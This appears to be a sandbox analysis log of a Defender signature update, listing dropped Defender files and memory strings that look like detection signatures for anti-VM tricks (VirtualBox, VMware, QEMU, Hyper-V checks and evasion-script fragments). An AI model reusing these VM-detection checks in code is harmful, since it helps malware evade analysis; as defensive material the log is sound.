Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mt-MT\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hi-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pa-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ne-NP\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ml-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ur-PK\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpRtp.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\az-Latn-AZ\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES-valencia\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kk-KZ\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpOAV.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sq-AL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fil-PH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ga-IE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpOAV.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\is-IS\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\eu-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\DefenderCSP.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\km-KH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\or-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetoursCopyAccelerator.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ka-GE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gu-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kn-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mi-NZ\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSvc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mpextms.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCommu.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ms-MY\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lo-LA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ta-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: Systeminfo | findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: .)*.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp Binary or memory string: *VMWARE*
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.toc.|!\qemu-system-x86_64.exe
